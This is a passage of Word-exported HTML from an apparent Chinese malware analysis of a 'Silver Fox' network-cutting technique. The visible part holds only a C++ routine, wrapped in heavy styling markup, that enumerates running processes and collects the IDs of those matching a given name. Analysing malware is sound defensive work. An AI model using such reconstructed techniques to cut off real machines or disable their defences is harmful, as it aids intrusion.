11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateToolhelp32Snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">TH32CS_SNAPPROCESS, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PROCESSENTRY32W pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwSize </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32FirstW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">do</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">processName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">szExeFile</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">push_back</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">th32ProcessID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim 